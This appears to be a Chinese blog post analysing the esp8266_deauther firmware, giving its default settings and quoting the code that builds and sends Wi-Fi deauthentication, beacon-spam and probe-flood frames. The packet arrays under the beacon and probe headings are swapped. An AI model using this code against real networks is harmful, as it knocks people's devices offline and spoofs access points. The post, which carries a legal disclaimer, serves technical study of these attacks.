esp8266_deauther第四篇

这一系列的文章仅作技术研究,请遵守相关法律(中华人民共和国网络安全法),请勿使用相关技术来攻击他人!

1 软件配置方法

1.1wifi相关配置


这一部分的配置在wifi.h文件中,这里规定了web文件的位置,已经wifi的配置。比如登陆的ip地址,默认是192.168.4.1,默认的子网掩码是255.255.255.0。


   
   
   
   
  1. // Server and other global objects
  2. ESP8266WebServer server(80);
  3. DNSServer dnsServer;
  4. IPAddress apIP(192, 168, 4, 1);
  5. IPAddress netMsk(255, 255, 255, 0);
  6. File fsUploadFile;
  7. // current WiFi mode and config
  8. uint8_t wifiMode = WIFI_MODE_OFF;
  9. bool wifi_config_hidden = false;
  10. bool wifi_config_captivePortal = false;
  11. String wifi_config_ssid;
  12. String wifi_config_password;
  13. String wifi_config_path;

1.2核心配置


这一部分的配置在Setting.h中,比如版本号、攻击超时时间、wifi的channel、SSID、password、是否隐藏SSID、语言等。比如登陆使用的SSID默认为pwned,密码默认为deauther,默认的语言为英语。本来想做一个汉化包进去方便中国爱好者使用,后来发现在V2.1中,已经加入了中文语言包。V2.1web页面支持的语言包括:cn中文、cs捷克语、de德语、en英语、es西班牙语、fi芬兰语、fr法语、it意大利语、ro罗马尼亚语、ru俄语、tlh克林贡语


   
   
   
   
  1. bool changed = false;
  2. String version = VERSION;
  3. bool beaconChannel = false;
  4. bool autosave = true;
  5. bool beaconInterval = false;
  6. bool cli = true;
  7. bool displayInterface = USE_DISPLAY;
  8. bool webInterface = true;
  9. bool webSpiffs = false;
  10. bool randomTX = false;
  11. bool ledEnabled = true;
  12. bool serialEcho = true;
  13. uint32_t attackTimeout = 600;
  14. uint32_t autosaveTime = 10000;
  15. uint32_t displayTimeout = 600;
  16. uint16_t deauthsPerTarget = 20;
  17. uint16_t chTime = 384;
  18. uint16_t minDeauths = 3;
  19. uint8_t forcePackets = 1;
  20. uint8_t channel = 9;
  21. uint8_t deauthReason = 1;
  22. uint8_t *macSt;
  23. uint8_t *macAP;
  24. uint8_t probesPerSSID = 1;
  25. String ssid = "pwned";
  26. String password = "deauther";
  27. bool hidden = false;
  28. bool captivePortal = true;
  29. String lang = "en";

(3)其他配置
其他的配置设及到一些关键的数据结构,这里没有多做研究。 

2 网络攻击核心代码解析 

2.1 deauth攻击

(1)deauth攻击数据包deauthPacket[26]的结构


   
   
   
   
  1. uint8_t deauthPacket[ 26] = {
  2. /* 0 - 1 */ 0xC0, 0x00, // type, subtype c0: deauth (a0: disassociate)
  3. /* 2 - 3 */ 0x00, 0x00, // duration (SDK takes care of that)
  4. /* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
  5. /* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // source (ap)
  6. /* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // BSSID (ap)
  7. /* 22 - 23 */ 0x00, 0x00, // fragment & squence number
  8. /* 24 - 25 */ 0x01, 0x00 // reason code (1 = unspecified reason)
  9. }

(2)deauth攻击核心代码


   
   
   
   
  1. bool Attack::deauthDevice( uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch) {
  2. if (!stMac) return false; // exit when station mac is null
  3. // Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging
  4. bool success = false;
  5. // build deauth packet
  6. packetSize = sizeof(deauthPacket);
  7. memcpy(&deauthPacket[ 4], stMac, 6);
  8. memcpy(&deauthPacket[ 10], apMac, 6);
  9. memcpy(&deauthPacket[ 16], apMac, 6);
  10. deauthPacket[ 24] = reason;
  11. // send deauth frame
  12. deauthPacket[ 0] = 0xc0;
  13. if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
  14. success = true;
  15. deauth.packetCounter++;
  16. }
  17. // send disassociate frame
  18. deauthPacket[ 0] = 0xa0;
  19. if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
  20. success = true;
  21. deauth.packetCounter++;
  22. }
  23. // send another packet, this time from the station to the accesspoint
  24. if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
  25. // build deauth packet
  26. memcpy(&deauthPacket[ 4], apMac, 6);
  27. memcpy(&deauthPacket[ 10], stMac, 6);
  28. memcpy(&deauthPacket[ 16], stMac, 6);
  29. // send deauth frame
  30. deauthPacket[ 0] = 0xc0;
  31. if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
  32. success = true;
  33. deauth.packetCounter++;
  34. }
  35. // send disassociate frame
  36. deauthPacket[ 0] = 0xa0;
  37. if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
  38. success = true;
  39. deauth.packetCounter++;
  40. }
  41. }
  42. if (success) deauth.time = currentTime;
  43. return success;
  44. }

2.2 beacon攻击

(1)beacon攻击数据包beaconPacket[68]的结构


   
   
   
   
  1. uint8_t probePacket[ 68] = {
  2. /* 0 - 1 */ 0x40, 0x00, // Type: Probe Request
  3. /* 2 - 3 */ 0x00, 0x00, // Duration: 0 microseconds
  4. /* 4 - 9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Destination: Broadcast
  5. /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, // Source: random MAC
  6. /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // BSS Id: Broadcast
  7. /* 22 - 23 */ 0x00, 0x00, // Sequence number (will be replaced by the SDK)
  8. /* 24 - 25 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
  9. /* 26 - 57 */ 0x20, 0x20, 0x20, 0x20, // SSID
  10. 0x20, 0x20, 0x20, 0x20,
  11. 0x20, 0x20, 0x20, 0x20,
  12. 0x20, 0x20, 0x20, 0x20,
  13. 0x20, 0x20, 0x20, 0x20,
  14. 0x20, 0x20, 0x20, 0x20,
  15. 0x20, 0x20, 0x20, 0x20,
  16. 0x20, 0x20, 0x20, 0x20,
  17. /* 58 - 59 */ 0x01, 0x08, // Tag Number: Supported Rates (1), Tag length: 8
  18. /* 60 */ 0x82, // 1(B)
  19. /* 61 */ 0x84, // 2(B)
  20. /* 62 */ 0x8b, // 5.5(B)
  21. /* 63 */ 0x96, // 11(B)
  22. /* 64 */ 0x24, // 18
  23. /* 65 */ 0x30, // 24
  24. /* 66 */ 0x48, // 36
  25. /* 67 */ 0x6c // 54
  26. }

(2)beacon攻击核心代码


   
   
   
   
  1. bool Attack::sendBeacon( uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
  2. packetSize = sizeof(beaconPacket);
  3. if (wpa2) {
  4. beaconPacket[ 34] = 0x31;
  5. } else {
  6. beaconPacket[ 34] = 0x21;
  7. packetSize -= 26;
  8. }
  9. int ssidLen = strlen(ssid);
  10. if (ssidLen > 32) ssidLen = 32;
  11. memcpy(&beaconPacket[ 10], mac, 6);
  12. memcpy(&beaconPacket[ 16], mac, 6);
  13. memcpy(&beaconPacket[ 38], ssid, ssidLen);
  14. beaconPacket[ 82] = ch;
  15. // =====
  16. uint16_t tmpPacketSize = (packetSize - 32) + ssidLen; // calc size
  17. uint8_t* tmpPacket = new uint8_t[tmpPacketSize]; // create packet buffer
  18. memcpy(&tmpPacket[ 0], &beaconPacket[ 0], 38 + ssidLen); // copy first half of packet into buffer
  19. tmpPacket[ 37] = ssidLen; // update SSID length byte
  20. memcpy(&tmpPacket[ 38 + ssidLen], &beaconPacket[ 70], wpa2 ? 39 : 13); // copy second half of packet into buffer
  21. if (sendPacket(tmpPacket, tmpPacketSize, ch, settings.getForcePackets())) {
  22. beacon.time = currentTime;
  23. beacon.packetCounter++;
  24. delete tmpPacket; // free memory of allocated buffer
  25. return true;
  26. } else {
  27. delete tmpPacket; // free memory of allocated buffer
  28. return false;
  29. }
  30. // =====
  31. }

2.3 probe攻击

(1)probe攻击数据包probePacket[109]的结构


   
   
   
   
  1. uint8_t beaconPacket[ 109] = {
  2. /* 0 - 3 */ 0x80, 0x00, 0x00, 0x00, // Type/Subtype: managment beacon frame
  3. /* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: broadcast
  4. /* 10 - 15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
  5. /* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
  6. // Fixed parameters
  7. /* 22 - 23 */ 0x00, 0x00, // Fragment & sequence number (will be done by the SDK)
  8. /* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
  9. /* 32 - 33 */ 0xe8, 0x03, // Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
  10. /* 34 - 35 */ 0x31, 0x00, // capabilities Tnformation
  11. // Tagged parameters
  12. // SSID parameters
  13. /* 36 - 37 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
  14. /* 38 - 69 */ 0x20, 0x20, 0x20, 0x20,
  15. 0x20, 0x20, 0x20, 0x20,
  16. 0x20, 0x20, 0x20, 0x20,
  17. 0x20, 0x20, 0x20, 0x20,
  18. 0x20, 0x20, 0x20, 0x20,
  19. 0x20, 0x20, 0x20, 0x20,
  20. 0x20, 0x20, 0x20, 0x20,
  21. 0x20, 0x20, 0x20, 0x20, // SSID
  22. // Supported Rates
  23. /* 70 - 71 */ 0x01, 0x08, // Tag: Supported Rates, Tag length: 8
  24. /* 72 */ 0x82, // 1(B)
  25. /* 73 */ 0x84, // 2(B)
  26. /* 74 */ 0x8b, // 5.5(B)
  27. /* 75 */ 0x96, // 11(B)
  28. /* 76 */ 0x24, // 18
  29. /* 77 */ 0x30, // 24
  30. /* 78 */ 0x48, // 36
  31. /* 79 */ 0x6c, // 54
  32. // Current Channel
  33. /* 80 - 81 */ 0x03, 0x01, // Channel set, length
  34. /* 82 */ 0x01, // Current Channel
  35. // RSN information
  36. /* 83 - 84 */ 0x30, 0x18,
  37. /* 85 - 86 */ 0x01, 0x00,
  38. /* 87 - 90 */ 0x00, 0x0f, 0xac, 0x02,
  39. /* 91 - 92 */ 0x02, 0x00,
  40. /* 93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, /*Fix: changed 0x02(TKIP) to 0x04(CCMP) is default. WPA2 with TKIP not supported by many devices*/
  41. /* 101 - 102 */ 0x01, 0x00,
  42. /* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,
  43. /* 107 - 108 */ 0x00, 0x00}

(2)probe攻击核心代码


   
   
   
   
  1. bool Attack::sendProbe( uint8_t* mac, const char* ssid, uint8_t ch) {
  2. packetSize = sizeof(probePacket);
  3. int ssidLen = strlen(ssid);
  4. if (ssidLen > 32) ssidLen = 32;
  5. memcpy(&probePacket[ 10], mac, 6);
  6. memcpy(&probePacket[ 26], ssid, ssidLen);
  7. if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
  8. probe.time = currentTime;
  9. probe.packetCounter++;
  10. return true;
  11. }
  12. return false;
  13. }

你可能感兴趣的:(ESP8266)